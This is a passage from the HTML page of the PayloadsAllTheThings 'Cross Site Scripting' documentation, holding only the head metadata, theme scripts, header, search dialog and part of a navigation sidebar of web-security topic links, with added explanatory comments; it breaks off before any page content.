PayloadsAllTheThings/XSS Injection/index.html


<!doctype html>
<html lang="en" class="no-js">
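<head>
  <!-- Document metadata for the "Cross Site Scripting" page of a MkDocs / Material generated site. -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <meta name="description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
  <link rel="canonical" href="https://swisskyrepo.github.io/PayloadsAllTheThings/XSS%20Injection/">
  <link rel="prev" href="../XSLT%20Injection/">
  <link rel="next" href="1%20-%20XSS%20Filter%20Bypass/">
  <link rel="icon" href="../assets/images/favicon.png">
  <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.49">
  <title>Cross Site Scripting - Payloads All The Things</title>

  <!-- Theme stylesheets, loaded relative to the site root. -->
  <link rel="stylesheet" href="../assets/stylesheets/main.6f8fc17f.min.css">
  <link rel="stylesheet" href="../assets/stylesheets/palette.06af60db.min.css">
  <style>
    .social-container {
      float: right;
    }
  </style>

  <!-- Fonts are fetched from a third-party origin (fonts.googleapis.com / fonts.gstatic.com).
       Any Content-Security-Policy for the site has to allow these origins, or the fonts
       have to be self-hosted. The ampersand in the query string is written as &amp;amp; so
       the attribute value is valid HTML. -->
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&amp;display=fallback">
  <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
  <link rel="stylesheet" href="../custom.css">

  <!-- Inline bootstrap script. It defines four globals:
       __md_scope (URL of the parent directory of the current location),
       __md_hash (integer hash of a string),
       __md_get (JSON.parse of a storage item keyed by scope pathname + "." + name, localStorage by default),
       __md_set (JSON.stringify into storage; storage errors are silently ignored).
       Because this script and the style blocks above are inline, a Content-Security-Policy
       for the site needs a hash or nonce for each of them, or 'unsafe-inline'. -->
  <script>__md_scope=new URL("..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>

  <!-- Social preview cards. The image URLs percent-encode the space in the path,
       matching the canonical and og:url values. -->
  <meta property="og:type" content="website">
  <meta property="og:title" content="Cross Site Scripting - Payloads All The Things">
  <meta property="og:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
  <meta property="og:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/XSS%20Injection/README.png">
  <meta property="og:image:type" content="image/png">
  <meta property="og:image:width" content="1200">
  <meta property="og:image:height" content="630">
  <meta property="og:url" content="https://swisskyrepo.github.io/PayloadsAllTheThings/XSS%20Injection/">
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:title" content="Cross Site Scripting - Payloads All The Things">
  <meta name="twitter:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
  <meta name="twitter:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/XSS%20Injection/README.png">
</head>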
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<!-- Checkboxes that the drawer and search labels elsewhere in the page point at via their "for" attributes. -->
<input class="md-toggle" id="__drawer" data-md-toggle="drawer" type="checkbox" autocomplete="off">
<input class="md-toggle" id="__search" data-md-toggle="search" type="checkbox" autocomplete="off">
<!-- Overlay label bound to the drawer checkbox. -->
<label class="md-overlay" for="__drawer"></label>
<!-- Skip link: jumps to the in-page anchor #cross-site-scripting. -->
<div data-md-component="skip">
  <a class="md-skip" href="#cross-site-scripting">
    Skip to content
  </a>
</div>
<!-- Announcement slot; it carries no content in this page. -->
<div data-md-component="announce">
</div>
<!-- Site header: logo link, drawer label, site/page title, colour-palette switch, search dialog and repository link. -->
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<!-- Logo: relative link to the parent directory (site root). -->
<a href=".." title="Payloads All The Things" class="md-header__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
<!-- Label bound to the #__drawer checkbox. -->
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
</label>
<!-- Two title slots: the site name and the current page topic. -->
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Payloads All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
Cross Site Scripting
</span>
</div>
</div>
</div>
<!-- Palette switch: two radio inputs carry the light and dark settings in data-md-color-* attributes;
     each label points at the other radio, and both labels start out hidden. -->
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
</form>
<!-- Inline script: reads the stored "__palette" entry through __md_get (defined in the inline script in the
     document head). When the stored media value is "(prefers-color-scheme)", it takes the settings from the
     radio input matching the current colour scheme. It then copies every entry of palette.color onto the body
     element as a data-md-color-* attribute. Values are written with setAttribute, so stored strings are not
     parsed as markup. Being inline, the script needs a hash, a nonce or 'unsafe-inline' under a
     Content-Security-Policy. -->
<script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<!-- Label bound to the #__search checkbox. -->
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
</label>
<!-- Search dialog. The form has no action attribute and the result list is empty in the static markup.
     NOTE(review): results are presumably rendered client-side; since this page documents XSS payloads,
     confirm that the search script inserts indexed text as text rather than as HTML. -->
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<!-- Share control: the href is a javascript: placeholder and data-clipboard-text is empty in the static
     markup (presumably filled in by script). tabindex="-1" keeps it out of the tab order. A
     Content-Security-Policy without 'unsafe-inline' blocks javascript: URLs. -->
<a href="javascript:void(0)" class="md-search__icon md-icon" title="Share" aria-label="Share" data-clipboard data-clipboard-text="" data-md-component="search-share" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9a3 3 0 0 0-3 3 3 3 0 0 0 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.15c-.05.21-.08.43-.08.66 0 1.61 1.31 2.91 2.92 2.91s2.92-1.3 2.92-2.91A2.92 2.92 0 0 0 18 16.08"/></svg>
</a>
<!-- Reset button clears the search form. -->
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
</button>
</nav>
<div class="md-search__suggest" data-md-component="search-suggest"></div>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<!-- Repository link: absolute https URL, opens in the same tab (no target attribute). -->
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href=".." title="Payloads All The Things" class="md-nav__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
Payloads All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href=".." class="md-nav__link">
<span class="md-ellipsis">
Payloads All The Things
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CONTRIBUTING/" class="md-nav__link">
<span class="md-ellipsis">
CONTRIBUTING
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../DISCLAIMER/" class="md-nav__link">
<span class="md-ellipsis">
DISCLAIMER
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
API Key Leaks
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
API Key Leaks
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../API%20Key%20Leaks/" class="md-nav__link">
<span class="md-ellipsis">
API Key and Token Leaks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../API%20Key%20Leaks/IIS-Machine-Keys/" class="md-nav__link">
<span class="md-ellipsis">
IIS Machine Keys
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Account Takeover
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Account Takeover
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Account%20Takeover/" class="md-nav__link">
<span class="md-ellipsis">
Account Takeover
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Account%20Takeover/mfa-bypass/" class="md-nav__link">
<span class="md-ellipsis">
MFA Bypasses
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Business Logic Errors
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Business Logic Errors
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Business%20Logic%20Errors/" class="md-nav__link">
<span class="md-ellipsis">
Business Logic Errors
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
CORS Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CORS%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
CRLF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
CRLF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CRLF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Carriage Return Line Feed
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
CSV Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
CSV Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CSV%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
CSV Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
CVE Exploits
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
CVE Exploits
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../CVE%20Exploits/" class="md-nav__link">
<span class="md-ellipsis">
Common Vulnerabilities and Exposures
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../CVE%20Exploits/Log4Shell/" class="md-nav__link">
<span class="md-ellipsis">
CVE-2021-44228 Log4Shell
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_11" >
<label class="md-nav__link" for="__nav_11" id="__nav_11_label" tabindex="0">
<span class="md-ellipsis">
Clickjacking
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_11_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_11">
<span class="md-nav__icon md-icon"></span>
Clickjacking
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Clickjacking/" class="md-nav__link">
<span class="md-ellipsis">
Clickjacking
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
<label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
<span class="md-ellipsis">
Client Side Path Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_12">
<span class="md-nav__icon md-icon"></span>
Client Side Path Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Client%20Side%20Path%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Client Side Path Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_13" >
<label class="md-nav__link" for="__nav_13" id="__nav_13_label" tabindex="0">
<span class="md-ellipsis">
Command Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_13_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_13">
<span class="md-nav__icon md-icon"></span>
Command Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Command%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Command Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_14" >
<label class="md-nav__link" for="__nav_14" id="__nav_14_label" tabindex="0">
<span class="md-ellipsis">
Cross Site Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_14_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_14">
<span class="md-nav__icon md-icon"></span>
Cross Site Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Cross-Site%20Request%20Forgery/" class="md-nav__link">
<span class="md-ellipsis">
Cross-Site Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_15" >
<label class="md-nav__link" for="__nav_15" id="__nav_15_label" tabindex="0">
<span class="md-ellipsis">
DNS Rebinding
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_15_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_15">
<span class="md-nav__icon md-icon"></span>
DNS Rebinding
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../DNS%20Rebinding/" class="md-nav__link">
<span class="md-ellipsis">
DNS Rebinding
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_16" >
<label class="md-nav__link" for="__nav_16" id="__nav_16_label" tabindex="0">
<span class="md-ellipsis">
DOM Clobbering
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_16_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_16">
<span class="md-nav__icon md-icon"></span>
DOM Clobbering
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../DOM%20Clobbering/" class="md-nav__link">
<span class="md-ellipsis">
DOM Clobbering
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_17" >
<label class="md-nav__link" for="__nav_17" id="__nav_17_label" tabindex="0">
<span class="md-ellipsis">
Denial of Service
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_17_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_17">
<span class="md-nav__icon md-icon"></span>
Denial of Service
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Denial%20of%20Service/" class="md-nav__link">
<span class="md-ellipsis">
Denial of Service
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_18" >
<label class="md-nav__link" for="__nav_18" id="__nav_18_label" tabindex="0">
<span class="md-ellipsis">
Dependency Confusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_18_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_18">
<span class="md-nav__icon md-icon"></span>
Dependency Confusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Dependency%20Confusion/" class="md-nav__link">
<span class="md-ellipsis">
Dependency Confusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_19" >
<label class="md-nav__link" for="__nav_19" id="__nav_19_label" tabindex="0">
<span class="md-ellipsis">
Directory Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_19_label" aria-expanded="false">
